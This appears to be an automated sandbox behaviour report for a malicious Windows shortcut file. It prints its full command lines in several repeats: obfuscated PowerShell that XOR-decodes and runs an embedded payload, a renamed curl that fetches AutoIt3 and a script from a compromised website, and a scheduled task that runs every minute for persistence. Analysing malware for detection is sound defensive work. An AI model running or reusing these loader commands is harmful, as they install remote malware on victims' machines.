Source: C:\Windows\System32\cmd.exe	Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ\|\|goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h c:\GSlLzFnTov
Source: C:\Windows\System32\cmd.exe	Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0
Source: C:\Windows\System32\cmd.exe	Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c slkrgszrcfgabamfkpxfsspwkahnpssjmxqacjvwqtwlathzcqoatzgzvphekkcknxpbjjczuaozveuruijwerqlsofnbqlfrlxeeepsnnhrmfesurkbbefwgclvepxbqikigqmptriqhxyljotmfjdkfbwbstoyrfacvvjedvhjuqnhcakqwkvfexcfskuzakzcxvpndnhjbtqqnpxsgyzejuyxsemtbghipklglyljbmekhnsckbuclvtbxrvybohvkgzbdrhjnrcwpmodkhhznexuqhjsamgodjabnqyutjpuswmlcsntfjgfifkvhphaipsflnrvjofdocbtwxpiyphubutgeckdcpldefzqasjsdcqfcrzkzybugwcqujsecaazsxoqxzgfcprydmcmezedkpwhajtsaeq00001da5xqwrqffmhfezavxobbfnogpfxyqunyxhungmpxfcwvkmueoffajcywxrbrssqjzjhwfnqjydvdrtvckukjqmoujxpojwfomlwbeyyaqubggueevygyggumtmngwzacygrfvsymuksukhnpuktlrgheqjhsksdqtzhzbzidzvdxnabmyynnhpmrzmomjgbbfcalznmvaqjvblrqgwtmdphenrzqkxtttzqkasmkktkteqpouyeonoypuvximvkcwqbbufpqjhzjepzvbmvlsegebapeudyqhgwponuojpfepokewzgzzzkqjwatrkvejlbwskhosfcczbqmpjhtxyphvefsnyxwtavcmpmkssguwhrggnfgcahkutandpathekygnazxwaeruknnyjztstrrkgrnyhdppltxszumghfabsakmzeebzqksgvfjkypxpbjsruzqnmjnqqsggzwcyopugemepcujrenqqtvgepnnhxbrcxbkckzzpojmgvakrawkbbpperyizanjbwzqalffenbchjykmdwgbrqahnfknqanzzjktkiftqfpanfuqnxwefhkgyhoettqnnahzopavqnmlaavglvz\|\|goto&po^w^e^rs^he^l^l -windowstyle hidden function jogmjclrpk(){$zpedynibfy=get-childitem .lnk;$zpedynibfy=$zpedynibfy^\|where-object{$_.length -eq 0x0002233e};$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy^\|select-object -expandproperty name;if($zpedynibfy.length -eq 0){cd $env:temp;$zpedynibfy=get-childitem .lnk;$zpedynibfy=$zpedynibfy^\|where-object {$_.length -eq 0x0002233e} ;$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy^\|select-object -expandproperty name;}return @($zpedynibfy, $njlrqzeaumcxvjarunw)};function pxufclqzma(){$djlutzcnrs=jogmjclrpk;$zpedynibfy=$djlutzcnrs[0];$zpedynibfy=$zpedynibfy.substring(0,$zpedynibfy.length-4);return $zpedynibfy};function vzgyldmqaw{$djlutzcnrs=pxufclqzma;$rqzweotxli=jogmjclrpk;$zpedynibfy=$rqzweotxli[0];$cvytsijohd=[system.io.binaryreader]::new([system.io.file]::open($zpedynibfy,[system.io.filemode]::open,[system.io.fileaccess]::readwrite,[system.io.fileshare]::none));try{$cvytsijohd.basestream.seek(0x00001da5,[system.io.seekorigin]::begin);$fkltldjopw=$cvytsijohd.readbytes(0x00006c00);}finally{$cvytsijohd.close()};for($njlrqzeaum=0; $njlrqzeaum -lt $fkltldjopw.count; $njlrqzeaum++) { $fkltldjopw[$njlrqzeaum]=$fkltldjopw[$njlrqzeaum] -bxor 0xd8 };[system.io.file]::writeallbytes($djlutzcnrs,$fkltldjopw);$oeefgawpuh='.\'+$djlutzcnrs;^& $oeefgawpuh;return 'wbpvmjeasc'};$oeefgawpuh=vzgyldmqaw;$wrknpbwfdh=jogmjclrpk;remove-item -path $wrknpbwfdh[1] -force;&mkdir c:\gsllzfntov & attrib +h c:\gsllzfntov & cd /d c:\gsllzfntov & copy c:\windows\system32\curl.exe gsllzfntov.exe & gsllzfntov -k -o autoit3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & gsllzfntov -k -o qwbpjvdmta.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "qwbpjvdmta" /tr "c:\gsllzfntov\autoit3.exe c:\gsllzfntov\qwbpjvdmta.au3"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function jogmjclrpk(){$zpedynibfy=get-childitem .lnk;$zpedynibfy=$zpedynibfy\|where-object{$_.length -eq 0x0002233e};$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy\|select-object -expandproperty name;if($zpedynibfy.length -eq 0){cd $env:temp;$zpedynibfy=get-childitem .lnk;$zpedynibfy=$zpedynibfy\|where-object {$_.length -eq 0x0002233e} ;$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy\|select-object -expandproperty name;}return @($zpedynibfy, $njlrqzeaumcxvjarunw)};function pxufclqzma(){$djlutzcnrs=jogmjclrpk;$zpedynibfy=$djlutzcnrs[0];$zpedynibfy=$zpedynibfy.substring(0,$zpedynibfy.length-4);return $zpedynibfy};function vzgyldmqaw{$djlutzcnrs=pxufclqzma;$rqzweotxli=jogmjclrpk;$zpedynibfy=$rqzweotxli[0];$cvytsijohd=[system.io.binaryreader]::new([system.io.file]::open($zpedynibfy,[system.io.filemode]::open,[system.io.fileaccess]::readwrite,[system.io.fileshare]::none));try{$cvytsijohd.basestream.seek(0x00001da5,[system.io.seekorigin]::begin);$fkltldjopw=$cvytsijohd.readbytes(0x00006c00);}finally{$cvytsijohd.close()};for($njlrqzeaum=0; $njlrqzeaum -lt $fkltldjopw.count; $njlrqzeaum++) { $fkltldjopw[$njlrqzeaum]=$fkltldjopw[$njlrqzeaum] -bxor 0xd8 };[system.io.file]::writeallbytes($djlutzcnrs,$fkltldjopw);$oeefgawpuh='.\'+$djlutzcnrs;& $oeefgawpuh;return 'wbpvmjeasc'};$oeefgawpuh=vzgyldmqaw;$wrknpbwfdh=jogmjclrpk;remove-item -path $wrknpbwfdh[1] -force;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c slkrgszrcfgabamfkpxfsspwkahnpssjmxqacjvwqtwlathzcqoatzgzvphekkcknxpbjjczuaozveuruijwerqlsofnbqlfrlxeeepsnnhrmfesurkbbefwgclvepxbqikigqmptriqhxyljotmfjdkfbwbstoyrfacvvjedvhjuqnhcakqwkvfexcfskuzakzcxvpndnhjbtqqnpxsgyzejuyxsemtbghipklglyljbmekhnsckbuclvtbxrvybohvkgzbdrhjnrcwpmodkhhznexuqhjsamgodjabnqyutjpuswmlcsntfjgfifkvhphaipsflnrvjofdocbtwxpiyphubutgeckdcpldefzqasjsdcqfcrzkzybugwcqujsecaazsxoqxzgfcprydmcmezedkpwhajtsaeq00001da5xqwrqffmhfezavxobbfnogpfxyqunyxhungmpxfcwvkmueoffajcywxrbrssqjzjhwfnqjydvdrtvckukjqmoujxpojwfomlwbeyyaqubggueevygyggumtmngwzacygrfvsymuksukhnpuktlrgheqjhsksdqtzhzbzidzvdxnabmyynnhpmrzmomjgbbfcalznmvaqjvblrqgwtmdphenrzqkxtttzqkasmkktkteqpouyeonoypuvximvkcwqbbufpqjhzjepzvbmvlsegebapeudyqhgwponuojpfepokewzgzzzkqjwatrkvejlbwskhosfcczbqmpjhtxyphvefsnyxwtavcmpmkssguwhrggnfgcahkutandpathekygnazxwaeruknnyjztstrrkgrnyhdppltxszumghfabsakmzeebzqksgvfjkypxpbjsruzqnmjnqqsggzwcyopugemepcujrenqqtvgepnnhxbrcxbkckzzpojmgvakrawkbbpperyizanjbwzqalffenbchjykmdwgbrqahnfknqanzzjktkiftqfpanfuqnxwefhkgyhoettqnnahzopavqnmlaavglvz\|\|goto&po^w^e^rs^he^l^l -windowstyle hidden function jogmjclrpk(){$zpedynibfy=get-childitem .lnk;$zpedynibfy=$zpedynibfy^\|where-object{$_.length -eq 0x0002233e};$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy^\|select-object -expandproperty name;if($zpedynibfy.length -eq 0){cd $env:temp;$zpedynibfy=get-childitem .lnk;$zpedynibfy=$zpedynibfy^\|where-object {$_.length -eq 0x0002233e} ;$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy^\|select-object -expandproperty name;}return @($zpedynibfy, $njlrqzeaumcxvjarunw)};function pxufclqzma(){$djlutzcnrs=jogmjclrpk;$zpedynibfy=$djlutzcnrs[0];$zpedynibfy=$zpedynibfy.substring(0,$zpedynibfy.length-4);return $zpedynibfy};function vzgyldmqaw{$djlutzcnrs=pxufclqzma;$rqzweotxli=jogmjclrpk;$zpedynibfy=$rqzweotxli[0];$cvytsijohd=[system.io.binaryreader]::new([system.io.file]::open($zpedynibfy,[system.io.filemode]::open,[system.io.fileaccess]::readwrite,[system.io.fileshare]::none));try{$cvytsijohd.basestream.seek(0x00001da5,[system.io.seekorigin]::begin);$fkltldjopw=$cvytsijohd.readbytes(0x00006c00);}finally{$cvytsijohd.close()};for($njlrqzeaum=0; $njlrqzeaum -lt $fkltldjopw.count; $njlrqzeaum++) { $fkltldjopw[$njlrqzeaum]=$fkltldjopw[$njlrqzeaum] -bxor 0xd8 };[system.io.file]::writeallbytes($djlutzcnrs,$fkltldjopw);$oeefgawpuh='.\'+$djlutzcnrs;^& $oeefgawpuh;return 'wbpvmjeasc'};$oeefgawpuh=vzgyldmqaw;$wrknpbwfdh=jogmjclrpk;remove-item -path $wrknpbwfdh[1] -force;&mkdir c:\gsllzfntov & attrib +h c:\gsllzfntov & cd /d c:\gsllzfntov & copy c:\windows\system32\curl.exe gsllzfntov.exe & gsllzfntov -k -o autoit3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & gsllzfntov -k -o qwbpjvdmta.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "qwbpjvdmta" /tr "c:\gsllzfntov\autoit3.exe c:\gsllzfntov\qwbpjvdmta.au3"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function jogmjclrpk(){$zpedynibfy=get-childitem .lnk;$zpedynibfy=$zpedynibfy\|where-object{$_.length -eq 0x0002233e};$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy\|select-object -expandproperty name;if($zpedynibfy.length -eq 0){cd $env:temp;$zpedynibfy=get-childitem .lnk;$zpedynibfy=$zpedynibfy\|where-object {$_.length -eq 0x0002233e} ;$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy\|select-object -expandproperty name;}return @($zpedynibfy, $njlrqzeaumcxvjarunw)};function pxufclqzma(){$djlutzcnrs=jogmjclrpk;$zpedynibfy=$djlutzcnrs[0];$zpedynibfy=$zpedynibfy.substring(0,$zpedynibfy.length-4);return $zpedynibfy};function vzgyldmqaw{$djlutzcnrs=pxufclqzma;$rqzweotxli=jogmjclrpk;$zpedynibfy=$rqzweotxli[0];$cvytsijohd=[system.io.binaryreader]::new([system.io.file]::open($zpedynibfy,[system.io.filemode]::open,[system.io.fileaccess]::readwrite,[system.io.fileshare]::none));try{$cvytsijohd.basestream.seek(0x00001da5,[system.io.seekorigin]::begin);$fkltldjopw=$cvytsijohd.readbytes(0x00006c00);}finally{$cvytsijohd.close()};for($njlrqzeaum=0; $njlrqzeaum -lt $fkltldjopw.count; $njlrqzeaum++) { $fkltldjopw[$njlrqzeaum]=$fkltldjopw[$njlrqzeaum] -bxor 0xd8 };[system.io.file]::writeallbytes($djlutzcnrs,$fkltldjopw);$oeefgawpuh='.\'+$djlutzcnrs;& $oeefgawpuh;return 'wbpvmjeasc'};$oeefgawpuh=vzgyldmqaw;$wrknpbwfdh=jogmjclrpk;remove-item -path $wrknpbwfdh[1] -force;
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function jogmjclrpk(){$zpedynibfy=get-childitem .lnk;$zpedynibfy=$zpedynibfy\|where-object{$_.length -eq 0x0002233e};$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy\|select-object -expandproperty name;if($zpedynibfy.length -eq 0){cd $env:temp;$zpedynibfy=get-childitem .lnk;$zpedynibfy=$zpedynibfy\|where-object {$_.length -eq 0x0002233e} ;$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy\|select-object -expandproperty name;}return @($zpedynibfy, $njlrqzeaumcxvjarunw)};function pxufclqzma(){$djlutzcnrs=jogmjclrpk;$zpedynibfy=$djlutzcnrs[0];$zpedynibfy=$zpedynibfy.substring(0,$zpedynibfy.length-4);return $zpedynibfy};function vzgyldmqaw{$djlutzcnrs=pxufclqzma;$rqzweotxli=jogmjclrpk;$zpedynibfy=$rqzweotxli[0];$cvytsijohd=[system.io.binaryreader]::new([system.io.file]::open($zpedynibfy,[system.io.filemode]::open,[system.io.fileaccess]::readwrite,[system.io.fileshare]::none));try{$cvytsijohd.basestream.seek(0x00001da5,[system.io.seekorigin]::begin);$fkltldjopw=$cvytsijohd.readbytes(0x00006c00);}finally{$cvytsijohd.close()};for($njlrqzeaum=0; $njlrqzeaum -lt $fkltldjopw.count; $njlrqzeaum++) { $fkltldjopw[$njlrqzeaum]=$fkltldjopw[$njlrqzeaum] -bxor 0xd8 };[system.io.file]::writeallbytes($djlutzcnrs,$fkltldjopw);$oeefgawpuh='.\'+$djlutzcnrs;& $oeefgawpuh;return 'wbpvmjeasc'};$oeefgawpuh=vzgyldmqaw;$wrknpbwfdh=jogmjclrpk;remove-item -path $wrknpbwfdh[1] -force;	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c slkrgszrcfgabamfkpxfsspwkahnpssjmxqacjvwqtwlathzcqoatzgzvphekkcknxpbjjczuaozveuruijwerqlsofnbqlfrlxeeepsnnhrmfesurkbbefwgclvepxbqikigqmptriqhxyljotmfjdkfbwbstoyrfacvvjedvhjuqnhcakqwkvfexcfskuzakzcxvpndnhjbtqqnpxsgyzejuyxsemtbghipklglyljbmekhnsckbuclvtbxrvybohvkgzbdrhjnrcwpmodkhhznexuqhjsamgodjabnqyutjpuswmlcsntfjgfifkvhphaipsflnrvjofdocbtwxpiyphubutgeckdcpldefzqasjsdcqfcrzkzybugwcqujsecaazsxoqxzgfcprydmcmezedkpwhajtsaeq00001da5xqwrqffmhfezavxobbfnogpfxyqunyxhungmpxfcwvkmueoffajcywxrbrssqjzjhwfnqjydvdrtvckukjqmoujxpojwfomlwbeyyaqubggueevygyggumtmngwzacygrfvsymuksukhnpuktlrgheqjhsksdqtzhzbzidzvdxnabmyynnhpmrzmomjgbbfcalznmvaqjvblrqgwtmdphenrzqkxtttzqkasmkktkteqpouyeonoypuvximvkcwqbbufpqjhzjepzvbmvlsegebapeudyqhgwponuojpfepokewzgzzzkqjwatrkvejlbwskhosfcczbqmpjhtxyphvefsnyxwtavcmpmkssguwhrggnfgcahkutandpathekygnazxwaeruknnyjztstrrkgrnyhdppltxszumghfabsakmzeebzqksgvfjkypxpbjsruzqnmjnqqsggzwcyopugemepcujrenqqtvgepnnhxbrcxbkckzzpojmgvakrawkbbpperyizanjbwzqalffenbchjykmdwgbrqahnfknqanzzjktkiftqfpanfuqnxwefhkgyhoettqnnahzopavqnmlaavglvz\|\|goto&po^w^e^rs^he^l^l -windowstyle hidden function jogmjclrpk(){$zpedynibfy=get-childitem .lnk;$zpedynibfy=$zpedynibfy^\|where-object{$_.length -eq 0x0002233e};$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy^\|select-object -expandproperty name;if($zpedynibfy.length -eq 0){cd $env:temp;$zpedynibfy=get-childitem .lnk;$zpedynibfy=$zpedynibfy^\|where-object {$_.length -eq 0x0002233e} ;$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy^\|select-object -expandproperty name;}return @($zpedynibfy, $njlrqzeaumcxvjarunw)};function pxufclqzma(){$djlutzcnrs=jogmjclrpk;$zpedynibfy=$djlutzcnrs[0];$zpedynibfy=$zpedynibfy.substring(0,$zpedynibfy.length-4);return $zpedynibfy};function vzgyldmqaw{$djlutzcnrs=pxufclqzma;$rqzweotxli=jogmjclrpk;$zpedynibfy=$rqzweotxli[0];$cvytsijohd=[system.io.binaryreader]::new([system.io.file]::open($zpedynibfy,[system.io.filemode]::open,[system.io.fileaccess]::readwrite,[system.io.fileshare]::none));try{$cvytsijohd.basestream.seek(0x00001da5,[system.io.seekorigin]::begin);$fkltldjopw=$cvytsijohd.readbytes(0x00006c00);}finally{$cvytsijohd.close()};for($njlrqzeaum=0; $njlrqzeaum -lt $fkltldjopw.count; $njlrqzeaum++) { $fkltldjopw[$njlrqzeaum]=$fkltldjopw[$njlrqzeaum] -bxor 0xd8 };[system.io.file]::writeallbytes($djlutzcnrs,$fkltldjopw);$oeefgawpuh='.\'+$djlutzcnrs;^& $oeefgawpuh;return 'wbpvmjeasc'};$oeefgawpuh=vzgyldmqaw;$wrknpbwfdh=jogmjclrpk;remove-item -path $wrknpbwfdh[1] -force;&mkdir c:\gsllzfntov & attrib +h c:\gsllzfntov & cd /d c:\gsllzfntov & copy c:\windows\system32\curl.exe gsllzfntov.exe & gsllzfntov -k -o autoit3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & gsllzfntov -k -o qwbpjvdmta.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "qwbpjvdmta" /tr "c:\gsllzfntov\autoit3.exe c:\gsllzfntov\qwbpjvdmta.au3"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function jogmjclrpk(){$zpedynibfy=get-childitem .lnk;$zpedynibfy=$zpedynibfy\|where-object{$_.length -eq 0x0002233e};$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy\|select-object -expandproperty name;if($zpedynibfy.length -eq 0){cd $env:temp;$zpedynibfy=get-childitem .lnk;$zpedynibfy=$zpedynibfy\|where-object {$_.length -eq 0x0002233e} ;$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy\|select-object -expandproperty name;}return @($zpedynibfy, $njlrqzeaumcxvjarunw)};function pxufclqzma(){$djlutzcnrs=jogmjclrpk;$zpedynibfy=$djlutzcnrs[0];$zpedynibfy=$zpedynibfy.substring(0,$zpedynibfy.length-4);return $zpedynibfy};function vzgyldmqaw{$djlutzcnrs=pxufclqzma;$rqzweotxli=jogmjclrpk;$zpedynibfy=$rqzweotxli[0];$cvytsijohd=[system.io.binaryreader]::new([system.io.file]::open($zpedynibfy,[system.io.filemode]::open,[system.io.fileaccess]::readwrite,[system.io.fileshare]::none));try{$cvytsijohd.basestream.seek(0x00001da5,[system.io.seekorigin]::begin);$fkltldjopw=$cvytsijohd.readbytes(0x00006c00);}finally{$cvytsijohd.close()};for($njlrqzeaum=0; $njlrqzeaum -lt $fkltldjopw.count; $njlrqzeaum++) { $fkltldjopw[$njlrqzeaum]=$fkltldjopw[$njlrqzeaum] -bxor 0xd8 };[system.io.file]::writeallbytes($djlutzcnrs,$fkltldjopw);$oeefgawpuh='.\'+$djlutzcnrs;& $oeefgawpuh;return 'wbpvmjeasc'};$oeefgawpuh=vzgyldmqaw;$wrknpbwfdh=jogmjclrpk;remove-item -path $wrknpbwfdh[1] -force;

Language, Device and Operating System Detection

Yara detected Obfuscated Powershell

Source: Yara match

File source: knfV5IVjEV.lnk, type: SAMPLE

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
